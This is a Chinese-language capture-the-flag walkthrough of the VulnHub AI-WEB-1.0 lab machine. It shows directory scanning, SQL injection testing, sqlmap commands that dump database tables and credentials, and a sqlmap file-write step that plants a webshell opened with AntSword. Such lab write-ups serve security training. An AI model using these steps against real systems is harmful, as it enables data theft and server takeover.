靶机通关|AI-WEB-1.0 靶机通关攻略

一、环境准备

1.AI-WEB-1.0靶机

https://www.vulnhub.com/entry/ai-web-1,353/

压缩包解压后,直接双击打开。(注:将靶机连接方式改为NAT模式)

2.kali攻击机

3.蚁剑webshell工具

https://github.com/AntSwordProject/

二、网站查询

1.御剑2014查IP (查询的IP为虚拟网卡vMnet8的IP)

访问网站

2.用扫描目录的工具(御剑无字典大小限制版)扫描当前网站的目录

分别访问roborts.txt,index.html

我们发现robots.txt中有标明目录,我们再去尝试一一访问。

3.继续扫http://192.168.61.129/se3reTdir777/http://192.168.61.129/m3diNf0下目录。

得到http://192.168.61.129/se3reTdir777/index.php与http://192.168.61.129/m3diNf0/info.php

访问http://192.168.61.129/m3diNf0/info.php

http://192.168.61.129/se3reTdir777中发现提交框,开始尝试注入。

三、注入尝试

1.尝试SQL注入

判断是否有SQL注入

在输入框输入

1'   //有报错信息
1    //有结果

2.抓包设置注入点,然后用工具sqlmap去注入

3.查库

python3 sqlmap.py -r '/home/kali/桌面/2.txt' --batch --current-db

库名:aiweb1

4.查表

python3 sqlmap.py -r '/home/kali/桌面/2.txt' --batch -D aiweb1 --tables

表名:user、systemUser

5.查user数据

python3 sqlmap.py -r '/home/kali/桌面/2.txt'--batch -D aiweb1 -T systemUser --dump

得到账号与密码,但是没有登录的地方也没有文件上传的地方。

四、写入木马

由访问http://192.168.61.129/m3diNf0/info.php得文件所处路径。

python3 sqlmap.py -r '/home/kali/桌面/2.txt' --file-write  --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php

写入成功,使用蚁剑连接。

连接成功,通关完成。

  • 15
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值